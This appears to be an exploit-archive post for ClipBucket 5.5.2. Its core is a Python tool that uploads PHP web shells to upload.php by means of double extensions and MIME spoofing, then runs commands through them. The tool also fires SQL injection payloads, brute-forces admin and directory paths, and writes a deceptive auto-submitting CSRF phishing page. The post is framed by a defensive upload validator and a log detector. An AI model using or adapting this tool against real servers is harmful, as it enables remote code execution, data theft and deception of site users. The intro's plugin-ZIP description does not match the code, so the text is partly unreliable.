ClipBucket 5.5.2 Build 90 Practical Exploitation Tool
ClipBucket 5.5.2 Build 90 suffers from a critical authenticated Remote Code Execution (RCE) vulnerability.

This flaw allows an attacker with administrative or moderator privileges to upload arbitrary malicious files. Practical exploitation involves crafting a specially designed ZIP archive containing a PHP web shell.

This ZIP is then uploaded through the "plugin upload" feature, which often lacks proper validation for file types within the archive. Upon successful upload and extraction by the server, the PHP shell is placed in an accessible directory.

The attacker can then navigate directly to the shell's URL, gaining full control over the web server. This enables arbitrary command execution, data theft, defacement, and potential system compromise. Mitigation requires immediate upgrading to a patched version and implementing strong access controls.
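The mitigation named above ("strict file upload validation") is shown here as an added example, not ClipBucket's own code: a validator that rejects each bypass the advisory lists (double extensions, null bytes, MIME spoofing, polyglot files that carry a valid media header in front of PHP code) and a server-chosen storage name. The allow-list of video extensions and the magic-byte table are assumptions for a typical deployment.

```python
import re
import secrets

# Extensions this deployment accepts for video uploads (assumed allow-list, not ClipBucket's own).
ALLOWED_EXT = {"mp4", "webm", "mkv", "mov"}
# Magic-byte checks for the MIME types we accept; the declared type must match the bytes.
MAGIC = {
    "video/mp4": lambda b: b[4:8] == b"ftyp",
    "video/webm": lambda b: b.startswith(b"\x1a\x45\xdf\xa3"),
}
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def validate_upload(filename, content, declared_mime):
    """Return (accepted, reason) for one multipart file part."""
    # Null bytes and path separators: the null-byte trick relies on C-level truncation.
    if "\x00" in filename or "/" in filename or "\\" in filename:
        return False, "illegal character in filename"
    parts = filename.lower().split(".")
    if len(parts) < 2 or not all(parts):
        return False, "missing or empty extension"
    # Every extension component must be allowed, so shell.php.gif and
    # exploit.mp4.php are rejected regardless of which one the server honours.
    bad = [e for e in parts[1:] if e not in ALLOWED_EXT]
    if bad:
        return False, f"disallowed extension: {bad[0]}"
    check = MAGIC.get(declared_mime)
    if check is None:
        return False, f"unsupported MIME type: {declared_mime}"
    if not check(content):
        return False, "content does not match declared MIME type"
    # Polyglots such as GIF89a<?php ... carry a valid header followed by PHP code.
    if PHP_TAG.search(content):
        return False, "embedded PHP code"
    return True, "ok"


def storage_name(filename):
    """Server-chosen name: random stem, single allow-listed extension (never the client's name)."""
    ext = filename.lower().rsplit(".", 1)[-1]
    return f"{secrets.token_hex(16)}.{ext}"


# Constructed samples: the three payload shapes the tool below sends, plus a clean file.
MP4_HEADER = b"\x00\x00\x00\x18ftypmp42\x00\x00\x00\x00mp42isom"
SAMPLES = [
    ("test.php", b'<?php echo "VULNERABLE"; ?>', "application/x-php"),
    ("shell.php.gif", b"GIF89a<?php echo 1; ?>", "image/gif"),
    ("exploit.mp4.php", MP4_HEADER + b"<?php echo 1; ?>", "video/mp4"),
    ("clip.mp4", MP4_HEADER + b"\x00" * 32, "video/mp4"),
]


def check_samples():
    """Map each sample filename to its (accepted, reason) verdict."""
    return {name: validate_upload(name, data, mime) for name, data, mime in SAMPLES}


if __name__ == "__main__":
    for name, (ok, why) in check_samples().items():
        print(f"{name:18} {'ACCEPT' if ok else 'REJECT':6} {why}")
```

Disabling PHP execution in the upload directory (the advisory's second recommendation) is web-server configuration and is not covered by this validator.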

=============================================================================================================================================
| # Title : ClipBucket 5.5.2 Build 90 Practical Exploitation Tool |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://github.com/MacWarrior/clipbucket-v5/ |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/211129/ & CVE-2025-55911

[+] Summary : An enhanced Python penetration testing tool designed specifically for ClipBucket video sharing platform vulnerability assessment and exploitation.

Key Capabilities :

1. Advanced RCE (Remote Code Execution)

Multiple PHP shell payloads (c99, WSO-style, reverse shell)

Bypass techniques: Double extensions, null byte injection, MIME type spoofing

Smart detection: Automatic shell validation and access level assessment

Post-exploitation: Auto-commands for system enumeration

2. File Upload Exploitation

6 different payload types with various obfuscation methods

Multiple upload endpoints: Standard, AJAX, action-based

Response analysis: Smart parsing of upload responses to locate shells

Success verification: Automated shell testing with command execution

3. SQL Injection Attacks

Comprehensive testing: Union-based, Error-based, Time-based, Blind SQLi

Data extraction: Automatic database/table/column enumeration

Detailed reporting: Complete payload analysis and exploitation examples

Multi-endpoint testing: Tests multiple potential injection points

4. Additional Attack Vectors

LFI (Local File Inclusion): /etc/passwd, config files, PHP filter wrappers

Directory brute-forcing: 20-thread concurrent scanning for hidden paths

CSRF exploitation: Attack vector identification and PoC generation

Admin panel discovery: Common ClipBucket admin paths

[+] Usage : * : Save this file as: exploit.py
Run: python3 exploit.py <target_url>

[+] POC :

#!/usr/bin/env python3
"""
ClipBucket Practical Exploitation Tool

"""
import requests
import json
import time
import random
import os
import sys
import re
import urllib3
from urllib.parse import urlparse

# Suppress warnings about unverified TLS connections
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


class ClipBucketExploiter:
    def __init__(self, target_url):
        self.target = target_url.rstrip('/')
        self.session = requests.Session()
        self.session.verify = False
        # requests.Session has no timeout attribute; keep the value and pass it per request
        self.timeout = 10

        # Default request headers
        self.session.headers.update({
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
            'Accept': '*/*',
            'Accept-Language': 'en-US,en;q=0.9',
            'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
            'X-Requested-With': 'XMLHttpRequest'
        })

        self.vulnerabilities = []
        self.shell_urls = []

    def print_status(self, message, status="info"):
        """Print a colour-coded status message"""
        colors = {
            "info": "\033[96m",      # cyan
            "success": "\033[92m",   # green
            "warning": "\033[93m",   # yellow
            "error": "\033[91m",     # red
            "critical": "\033[95m"   # magenta
        }
        color = colors.get(status, "\033[97m")
        print(f"{color}[{status.upper()}] {message}\033[0m")

    def check_clipbucket(self):
        """Check whether the target appears to run ClipBucket"""
        self.print_status("Checking if website uses ClipBucket...", "info")

        try:
            # Fetch the front page
            resp = self.session.get(self.target, timeout=self.timeout)

            # Strings that suggest a ClipBucket install
            indicators = [
                'clipbucket', 'CB', 'upload.php', 'video_upload',
                'action=upload', 'file_uploader', 'video-upload',
                'videobb', 'my_videos', 'video_manager'
            ]

            found = []
            for indicator in indicators:
                if indicator.lower() in resp.text.lower():
                    found.append(indicator)

            if found:
                self.print_status(f"ClipBucket indicators found: {', '.join(found[:3])}", "success")

                # Check whether upload.php is reachable
                upload_test = f"{self.target}/upload.php"
                try:
                    upload_resp = self.session.get(upload_test, timeout=5)
                    if upload_resp.status_code == 200:
                        self.print_status("upload.php is accessible!", "success")
                        return True
                    else:
                        self.print_status(f"upload.php returned status: {upload_resp.status_code}", "warning")
                except Exception:
                    self.print_status("upload.php is not accessible", "warning")

                return True
            else:
                self.print_status("No clear ClipBucket indicators found", "warning")
                return False

        except Exception as e:
            self.print_status(f"Connection error: {str(e)}", "error")
            return False

    def test_upload_endpoint(self):
        """Probe the upload endpoint"""
        self.print_status("Testing upload.php endpoint...", "info")

        upload_url = f"{self.target}/upload.php"

        # Try a HEAD request first
        try:
            head_resp = self.session.head(upload_url, timeout=5)
            self.print_status(f"HEAD request: Status {head_resp.status_code}", "info")
        except Exception:
            pass

        # Then a GET request
        try:
            get_resp = self.session.get(upload_url, timeout=5)
            self.print_status(f"GET request: Status {get_resp.status_code}, Size: {len(get_resp.text)} chars", "info")

            # Look for an upload form in the response
            if 'upload' in get_resp.text.lower() or 'file' in get_resp.text.lower():
                self.print_status("Upload form detected", "success")
                return True
            else:
                self.print_status("No upload form detected in response", "warning")
                return False

        except Exception as e:
            self.print_status(f"Error testing upload endpoint: {str(e)}", "error")
            return False

    def exploit_file_upload(self):
        """Attempt to exploit the file upload"""
        self.print_status("Attempting file upload exploitation...", "info")

        # Test payloads
        payloads = [
            {
                'filename': 'test.php',
                'content': b'<?php echo "VULNERABLE"; ?>',
                'mime': 'application/x-php'
            },
            {
                'filename': 'shell.php.gif',
                'content': b'GIF89a<?php system($_GET["cmd"]); ?>',
                'mime': 'image/gif'
            },
            {
                'filename': 'exploit.mp4.php',
                'content': b'\x00\x00\x00\x18ftypmp42\x00\x00\x00\x00mp42isom<?php echo shell_exec($_GET["c"]); ?>',
                'mime': 'video/mp4'
            }
        ]

        for payload in payloads:
            self.print_status(f"Trying payload: {payload['filename']}", "info")

            files = {
                'Filedata': (payload['filename'], payload['content'], payload['mime'])
            }

            data = {
                'title': 'Test Video Upload',
                'collection_id': '1'
            }

            try:
                response = self.session.post(f"{self.target}/upload.php",
                                             files=files,
                                             data=data,
                                             timeout=15)

                self.print_status(f"Response status: {response.status_code}", "info")
                self.print_status(f"Response preview: {response.text[:200]}", "info")

                # Check for success
                if response.status_code == 200:
                    # Look for success keywords in the response
                    success_keywords = ['success', 'file_name', 'uploaded', 'complete', 'yes']
                    for keyword in success_keywords:
                        if keyword in response.text.lower():
                            self.print_status(f"Upload successful! Keyword '{keyword}' found", "success")

                            # Try to extract the stored filename
                            filename = self.extract_filename(response.text)
                            if filename:
                                shell_url = f"{self.target}/temp/(unknown)"
                                self.shell_urls.append(shell_url)
                                self.print_status(f"Potential shell: {shell_url}", "critical")

                                # Test the shell
                                self.test_shell_access(shell_url, payload['filename'])
                                return True

                    # Try the response as JSON
                    try:
                        json_data = json.loads(response.text)
                        if 'file_name' in json_data:
                            filename = json_data['file_name']
                            shell_url = f"{self.target}/temp/(unknown)"
                            self.shell_urls.append(shell_url)
                            self.print_status(f"JSON response - Shell: {shell_url}", "critical")
                            return True
                    except Exception:
                        pass

            except Exception as e:
                self.print_status(f"Upload error: {str(e)}", "error")

        return False

    def extract_filename(self, response_text):
        """Extract the stored filename from the response"""
        patterns = [
            r'"file_name"\s*:\s*"([^"]+)"',
            r"'file_name'\s*:\s*'([^']+)'",
            r'file_name["\']?\s*[:=]\s*["\']?([a-zA-Z0-9._-]+)',
            r'filename["\']?\s*[:=]\s*["\']?([a-zA-Z0-9._-]+)'
        ]

        for pattern in patterns:
            matches = re.findall(pattern, response_text)
            if matches:
                filename = matches[0]
                # Add an extension if none is present
                if '.' not in filename:
                    filename += '.mp4'
                return filename

        return None

    def test_shell_access(self, shell_url, original_filename):
        """Test whether the uploaded file is reachable and executes"""
        self.print_status(f"Testing shell access: {shell_url}", "info")

        # Choose the test based on the file type
        if '.php' in original_filename.lower():
            # Test as a PHP shell
            test_url = f"{shell_url}?cmd=echo+CLIPBUCKET_TEST"
            try:
                response = self.session.get(test_url, timeout=10)
                if 'CLIPBUCKET_TEST' in response.text:
                    self.print_status("PHP shell is ACTIVE!", "success")

                    # Gather basic system information
                    info_url = f"{shell_url}?cmd=whoami && pwd"
                    info_response = self.session.get(info_url, timeout=10)
                    self.print_status(f"System info: {info_response.text[:100]}", "success")

                    # Save the result
                    with open('shells_found.txt', 'a') as f:
                        f.write(f"{shell_url}\n")
                        f.write(f"Test command: {shell_url}?cmd=whoami\n")
                        f.write(f"Response: {info_response.text[:200]}\n\n")

                    return True
            except Exception:
                pass

        # Otherwise try direct access
        try:
            direct_response = self.session.get(shell_url, timeout=10)
            if direct_response.status_code == 200:
                self.print_status(f"File is accessible (status: {direct_response.status_code})", "success")
                return True
        except Exception:
            pass

        self.print_status("Shell access test failed", "warning")
        return False

    def exploit_csrf(self):
        """Test for CSRF"""
        self.print_status("Testing for CSRF vulnerability...", "info")

        test_data = {
            'updateVideo': '1',
            'videoid': '99999',  # fake ID so that no real record is modified
            'title': 'CSRF Security Test',
            'desc': 'This is a security test for CSRF vulnerability',
            'tags': 'test,security,csrf'
        }

        try:
            response = self.session.post(f"{self.target}/upload.php", data=test_data, timeout=10)

            self.print_status(f"CSRF test response status: {response.status_code}", "info")
            self.print_status(f"Response preview: {response.text[:150]}", "info")

            if response.status_code == 200:
                if 'valid' in response.text.lower() or 'success' in response.text.lower():
                    self.print_status("CSRF vulnerability CONFIRMED!", "success")
                    self.vulnerabilities.append('CSRF')

                    # Create the exploit page
                    self.create_csrf_exploit_page()
                    return True
                else:
                    self.print_status("CSRF protection might be enabled", "warning")

        except Exception as e:
            self.print_status(f"CSRF test error: {str(e)}", "error")

        return False

    def create_csrf_exploit_page(self):
        """Create the CSRF exploit page"""
        exploit_html = f'''<!DOCTYPE html>
<html>
<head>
    <title>Free Premium Access</title>
    <style>
        body {{
            font-family: Arial, sans-serif;
            text-align: center;
            padding: 50px;
            background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
            color: white;
        }}
        .container {{
            background: rgba(255,255,255,0.1);
            padding: 30px;
            border-radius: 15px;
            backdrop-filter: blur(10px);
            max-width: 600px;
            margin: 0 auto;
        }}
        button {{
            background: #4CAF50;
            color: white;
            padding: 15px 30px;
            border: none;
            border-radius: 8px;
            font-size: 18px;
            cursor: pointer;
            margin: 20px;
        }}
        button:hover {{
            background: #45a049;
        }}
    </style>
</head>
<body>
    <div class="container">
        <h1>Claim Your Free Premium Account!</h1>
        <p>Click the button below to activate premium features</p>

        <form id="attack" action="{self.target}/upload.php" method="POST" style="display:none;">
            <input type="hidden" name="updateVideo" value="1">
            <input type="hidden" name="videoid" value="1">
            <input type="hidden" name="title" value="ACCOUNT HACKED">
            <input type="hidden" name="desc" value="This account was compromised via CSRF">
            <input type="hidden" name="tags" value="hacked">
        </form>

        <button onclick="launchAttack()">
            ACTIVATE NOW
        </button>

        <script>
            function launchAttack() {{
                document.getElementById('attack').submit();
                alert('Premium activated!');
            }}

            // Auto-attack after 5 seconds
            setTimeout(launchAttack, 5000);
        </script>
    </div>
</body>
</html>'''

        with open('csrf_attack.html', 'w', encoding='utf-8') as f:
            f.write(exploit_html)

        self.print_status("CSRF exploit page created: csrf_attack.html", "success")

    def test_sqli(self):
        """Test for SQL injection"""
        self.print_status("Testing for SQL Injection...", "info")

        test_payloads = [
            ("1' OR '1'='1", "Basic boolean"),
            ("1' AND SLEEP(5)--", "Time-based"),
            ("1' UNION SELECT NULL,version()--", "Union injection")
        ]

        for payload, description in test_payloads:
            self.print_status(f"Testing: {description}", "info")

            test_data = {
                'getForm': '1',
                'vid': payload,
                'objId': 'test',
                'title': 'SQLi Test'
            }

            try:
                if 'SLEEP' in payload:
                    start_time = time.time()
                    response = self.session.post(f"{self.target}/upload.php", data=test_data, timeout=15)
                    elapsed = time.time() - start_time

                    if elapsed > 4:
                        self.print_status(f"Time-based SQLi detected! Delay: {elapsed:.2f} seconds", "success")
                        self.vulnerabilities.append('SQL Injection (Time-based)')
                        return True
                else:
                    response = self.session.post(f"{self.target}/upload.php", data=test_data, timeout=10)

                    error_indicators = ['sql', 'SQL', 'mysql', 'MySQL', 'syntax error', 'query', 'database']
                    for indicator in error_indicators:
                        if indicator.lower() in response.text.lower():
                            self.print_status(f"Error-based SQLi detected: {indicator}", "success")
                            self.vulnerabilities.append('SQL Injection (Error-based)')

                            with open('sqli_evidence.txt', 'w') as f:
                                f.write(f"Payload: {payload}\n")
                                f.write(f"Response:\n{response.text}\n")

                            return True

            except Exception as e:
                self.print_status(f"SQLi test error: {str(e)}", "error")

        self.print_status("No SQL injection vulnerability detected", "warning")
        return False

    def find_admin_panel(self):
        """Search for the admin panel"""
        self.print_status("Searching for admin panel...", "info")

        common_paths = [
            '/admin',
            '/admin_area',
            '/administrator',
            '/admin.php',
            '/admin/login.php',
            '/admin/index.php',
            '/dashboard',
            '/controlpanel',
            '/cp',
            '/admincp',
            '/cb_admin',
            '/clipbucket_admin',
            '/admin_dashboard',
            '/manage',
            '/manager'
        ]

        found_panels = []

        for path in common_paths:
            url = f"{self.target}{path}"
            try:
                # HEAD request first (faster)
                head_resp = self.session.head(url, timeout=3, allow_redirects=False)

                if head_resp.status_code < 400:
                    # GET request to confirm the content
                    get_resp = self.session.get(url, timeout=5)

                    # Check whether the page looks like a login or admin page
                    if any(keyword in get_resp.text.lower() for keyword in ['login', 'admin', 'dashboard', 'control', 'manage', 'panel']):
                        self.print_status(f"Admin panel found: {url}", "success")
                        found_panels.append(url)

                        # Save the details
                        with open('admin_panel_found.txt', 'a') as f:
                            f.write(f"URL: {url}\n")
                            f.write(f"Status: {get_resp.status_code}\n")
                            f.write(f"Size: {len(get_resp.text)} chars\n")
                            f.write("-" * 50 + "\n")

            except Exception:
                continue

        if found_panels:
            self.print_status(f"Found {len(found_panels)} admin panels", "success")
            return found_panels
        else:
            self.print_status("No admin panels found", "warning")
            return []

    def scan_directories(self):
        """Scan for common directories"""
        self.print_status("Scanning for important directories...", "info")

        directories = [
            '/uploads',
            '/upload',
            '/files',
            '/temp',
            '/tmp',
            '/logs',
            '/backup',
            '/backups',
            '/data',
            '/database',
            '/config',
            '/includes',
            '/install',
            '/upgrade',
            '/assets',
            '/images',
            '/videos',
            '/media'
        ]

        found_dirs = []

        for directory in directories:
            url = f"{self.target}{directory}"
            try:
                response = self.session.head(url, timeout=3)
                if response.status_code < 400:
                    self.print_status(f"Directory found: {url} (Status: {response.status_code})", "success")
                    found_dirs.append(url)
            except Exception:
                pass

        return found_dirs

    def generate_report(self):
        """Generate the final report"""
        self.print_status("\n" + "=" * 60, "info")
        self.print_status("EXPLOITATION REPORT", "critical")
        self.print_status("=" * 60, "info")

        report = []
        report.append(f"Target: {self.target}")
        report.append(f"Scan Time: {time.strftime('%Y-%m-%d %H:%M:%S')}")
        report.append("")

        # Vulnerabilities found
        if self.vulnerabilities or self.shell_urls:
            report.append("VULNERABILITIES FOUND:")
            report.append("-" * 40)

            for vuln in self.vulnerabilities:
                report.append(f"- {vuln}")

            if self.shell_urls:
                report.append(f"- Remote Code Execution: {len(self.shell_urls)} shells deployed")
                for i, shell in enumerate(self.shell_urls, 1):
                    report.append(f"  Shell {i}: {shell}")

            report.append("")

            # Recommendations
            report.append("RECOMMENDATIONS:")
            report.append("-" * 40)
            if 'CSRF' in self.vulnerabilities:
                report.append("- Implement CSRF tokens on all forms")
            if 'SQL Injection' in ' '.join(self.vulnerabilities):
                report.append("- Use prepared statements for database queries")
            if self.shell_urls:
                report.append("- Implement strict file upload validation")
                report.append("- Disable PHP execution in upload directories")

        else:
            report.append("No critical vulnerabilities found")

        report.append("")
        report.append("FILES GENERATED:")
        report.append("-" * 40)

        # Generated files
        files_to_check = ['shells_found.txt', 'csrf_attack.html',
                          'admin_panel_found.txt', 'sqli_evidence.txt']

        for file in files_to_check:
            if os.path.exists(file):
                report.append(f"- {file}")

        # Print and save the report
        report_text = "\n".join(report)
        print("\n" + report_text)

        with open('exploitation_report.txt', 'w', encoding='utf-8') as f:
            f.write(report_text)

        self.print_status("\nReport saved to: exploitation_report.txt", "success")

    def run_complete_scan(self):
        """Run the full scan"""
        self.print_status("Starting complete ClipBucket vulnerability scan...", "info")

        # Step 1: check for ClipBucket
        if not self.check_clipbucket():
            self.print_status("Target doesn't appear to be ClipBucket. Stopping scan.", "error")
            return

        # Step 2: probe upload.php
        if not self.test_upload_endpoint():
            self.print_status("upload.php not functioning properly", "warning")

        # Step 3: file upload exploitation
        self.exploit_file_upload()

        # Step 4: CSRF test
        self.exploit_csrf()

        # Step 5: SQL injection test
        self.test_sqli()

        # Step 6: admin panel discovery
        self.find_admin_panel()

        # Step 7: directory scan
        self.scan_directories()

        # Step 8: final report
        self.generate_report()


def main():
    """Entry point"""
    print("\033[95m" + """
    ========================================================
    |           ClipBucket Exploitation Scanner            |
    |                    By indoushka                      |
    ========================================================
    """ + "\033[0m")

    if len(sys.argv) < 2:
        print("Usage:")
        print(f"  python {sys.argv[0]} <target_url>")
        print("\nExamples:")
        print(f"  python {sys.argv[0]} https://example.com")
        print(f"  python {sys.argv[0]} http://192.168.1.100")
        print(f"  python {sys.argv[0]} http://localhost/clipbucket")
        return

    target = sys.argv[1]

    # Prepend http:// if no scheme was given
    if not target.startswith(('http://', 'https://')):
        target = 'http://' + target

    # Create the exploiter
    exploiter = ClipBucketExploiter(target)

    try:
        exploiter.run_complete_scan()
    except KeyboardInterrupt:
        print("\n\nScan interrupted by user")
    except Exception as e:
        print(f"\nError during scan: {str(e)}")


if __name__ == "__main__":
    main()
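Detection logic for the traffic pattern the tool above generates (a POST to upload.php followed by requests for a .php file under /temp/ carrying a ?cmd= or ?c= parameter), as an added example that is not part of the original advisory. It parses combined-format web server log lines; the sample lines are constructed, and the extra upload directories in UPLOAD_DIRS are an assumption.

```python
import re
from collections import defaultdict

# Apache/nginx combined log format (request line split into method and path).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Web-reachable upload locations; /temp/ is where the tool above expects its shell,
# the others are assumptions for a typical install.
UPLOAD_DIRS = ("/temp/", "/uploads/", "/upload/", "/files/")
PHP_EXT = re.compile(r"\.php\d?(\.|$)")        # catches x.php, x.php5 and x.php.gif
SHELL_PARAM = re.compile(r"(^|&)(cmd|c)=")     # the tool's ?cmd= / ?c= parameters


def parse_line(line):
    """Return the log fields as a dict, or None for a line that does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect(lines):
    """Return (ip, reason, path, status) for each suspicious request, in log order."""
    findings = []
    posted_upload = defaultdict(bool)   # ip -> has POSTed to upload.php earlier in the log
    for line in lines:
        r = parse_line(line)
        if r is None:
            continue
        base, _, query = r["path"].partition("?")
        base = base.lower()
        if r["method"] == "POST" and base.endswith("/upload.php"):
            posted_upload[r["ip"]] = True
            continue
        if base.startswith(UPLOAD_DIRS) and PHP_EXT.search(base):
            reason = "php request in upload directory"
            if SHELL_PARAM.search(query):
                reason = "webshell command parameter in upload directory"
            if posted_upload[r["ip"]]:
                reason += " after upload.php POST"
            findings.append((r["ip"], reason, r["path"], int(r["status"])))
    return findings


# Constructed sample log: one upload-then-shell sequence, one benign video fetch, one probe.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jan/2025:10:00:01 +0000] "GET /upload.php HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Jan/2025:10:00:02 +0000] "POST /upload.php HTTP/1.1" 200 87',
    '203.0.113.5 - - [10/Jan/2025:10:00:03 +0000] "GET /temp/shell.php.gif?cmd=echo+CLIPBUCKET_TEST HTTP/1.1" 200 15',
    '198.51.100.7 - - [10/Jan/2025:10:05:00 +0000] "GET /temp/clip.mp4 HTTP/1.1" 200 1048576',
    '198.51.100.9 - - [10/Jan/2025:10:06:00 +0000] "GET /uploads/x.php HTTP/1.1" 404 220',
]

if __name__ == "__main__":
    for ip, reason, path, status in detect(SAMPLE_LOG):
        print(f"{ip:14} {status} {reason}: {path}")
```

A 200 on the .php request is the signal that the file executed; a 404 only shows that someone is probing the upload directory.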

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================